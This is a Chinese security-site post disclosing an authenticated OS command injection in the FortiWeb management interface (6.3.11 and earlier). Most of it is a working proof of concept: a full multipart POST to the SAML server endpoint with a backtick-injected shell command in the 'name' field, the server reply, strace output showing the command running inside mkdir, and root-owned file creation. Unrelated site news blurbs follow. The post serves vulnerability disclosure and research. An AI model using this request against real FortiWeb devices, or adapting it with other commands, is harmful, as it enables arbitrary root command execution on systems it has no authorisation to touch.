0day Fortinet FortiWeb OS 命令注入

007bug2021-08-21 11:32:04


       FortiWeb 管理界面(版本 6.3.11 及更早版本)中的操作系统命令注入漏洞可允许远程、经过身份验证的攻击者通过 SAML 服务器配置页面在系统上执行任意命令。

POC:

POST /api/v2.0/user/remoteserver.saml HTTP/1.1
Host: [redacted]
Cookie: [redacted]
User-Agent: [redacted]
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[redacted]/root/user/remote-user/saml-user/
X-Csrftoken: 814940160
Content-Type: multipart/form-data; boundary=---------------------------94351131111899571381631694412
Content-Length: 3068
Origin: https://[redacted]
Dnt: 1
Te: trailers
Connection: close
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="q_type"
1
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="name"
`touch /tmp/vulnerable`
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="entityID"
test
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="service-path"
/saml.sso
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="session-lifetime"
8
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="session-timeout"
30
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="sso-bind"
post
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="sso-bind_val"
1
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="sso-path"
/SAML2/POST
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="slo-bind"
post
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="slo-bind_val"
1
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="slo-path"
/SLO/POST
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="flag"
0
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="enforce-signing"
disable
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="enforce-signing_val"
0
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="metafile"; filename="test.xml"
Content-Type: text/xml
"1.0"
?>
test
test
urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified
-----------------------------94351131111899571381631694412--
HTTP/1.1 500 Internal Server Error
Date: Thu, 10 Jun 2021 11:59:45 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Set-Cookie: [redacted]
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: frame-ancestors 'self'
X-Content-Type-Options: nosniff
Content-Length: 20
Strict-Transport-Security: max-age=63072000
Connection: close
Content-Type: application/json
{"errcode": "-651"}

“touch”命令连接在 mkdir shell 命令中:

[pid 12867] execve("/migadmin/cgi-bin/fwbcgi", ["/migadmin/cgi-bin/fwbcgi"], 0x55bb0395bf00 /* 42 vars */) = 0
[pid 13934] execve("/bin/sh", ["sh", "-c", "mkdir /data/etc/saml/shibboleth/service_providers/`touch /tmp/vulnerable`"], 0x7fff56b1c608 /* 42 vars */) = 0
[pid 13935] execve("/bin/touch", ["touch", "/tmp/vulnerable"], 0x55774aa30bf8 /* 44 vars */) = 0
[pid 13936] execve("/bin/mkdir", ["mkdir", "/data/etc/saml/shibboleth/service_providers/"], 0x55774aa30be8 /* 44 vars */) = 0

在 FortiWeb 设备的本地命令行上看到“touch”命令的结果:

/# ls -l /tmp/vulnerable-rw-r--r--    1 root     0                0 Jun 10 11:59 /tmp/vulnerable/#
fortinetform
本作品采用《CC 协议》,转载必须注明作者和本文链接
0day Fortinet FortiWeb OS 命令注入
Adobe已发布修复程序,以解决其流行的Experience Manager内容管理解决方案中用于构建网站,移动应用程序和表单的五个关键漏洞。跨站点脚本(XSS)漏洞可能使攻击者能够在目标浏览器中执行JavaScript。 包括Adobe Exp...
在接下来的第二部分中,AdvIntel将对BlackCat的组织结构、招聘和运营过程进行分析。这反过来使得网络防御组织将Cobalt Strike的攻陷标志作为确凿的告警信号,增加了罪犯被发现的机会,并最终降低了他们攻击的持久性。不过,BlackCat的情况与主流叙事有所不同,因为该组织已经围绕自己编写的攻击性脚本建立了一套行动方案。这使BlackCat领先于其竞争对手。
WAF指纹识别工具
2022-04-11 06:18:47
原理发送正常的 HTTP 请求并分析响应;这确定了许多 WAF 解决方案。如果不成功,则发送多个HTTP 请求,并使用简单的逻辑来示例就是WAF。
新冠疫情所致远程办公和云端迁移的大潮,为网络罪犯开辟了新的途径。2021年,在远程工作状态影响下,世界各地的网络攻击急剧上升,勒索软件、网络钓鱼、人为错误操作等导致的数据泄露不断增加,全球范围内网络威胁依旧不断。特别是勒索软件的高度猖獗,在上半年的攻击次数已达到3.047亿,同比增长达151%,远超2020年全年攻击总数,对多国家、多行业、多领域造成不同程度的影响。
发送正常的 HTTP 请求并分析响应;这确定了许多 WAF 解决方案
报告显示,2021上半年全球威胁态势保持严峻,94%的受访者担心遭受勒索软件攻击的威胁。
Bleeping Computer 网站消息,在 Fortinet 发布 CVE-2023-27997 漏洞补丁近一个月后,数十万 FortiGate 防火墙易受该漏洞的影响。FortiOS 连接所有 Fortinet 网络组件,以将其集成到供应商的 Security Fabric 平台中的操作系统,在 6 月中旬发布的公告中,供应商警告称该漏洞可能已被攻击者利用。
专注网络与安全融合的全球网络安全厂商Fortinet,近日宣布推出新一代自研安全芯片FortiSP5,作为Fortinet ASIC技术的最新突破,有力推动了分布式网络边缘安全的重大飞跃。SSL 深度检测吞吐量高达2.5 Gbps,加速检查加密恶意流量的同时,确保卓越网络性能。Fortinet 始终贯彻可持续发展目标FortiSP5 行业领先的能耗和性能优势以及搭载该加速芯片的产品,将助力企业大幅降低功耗并节省设备占地空间。
007bug
暂无描述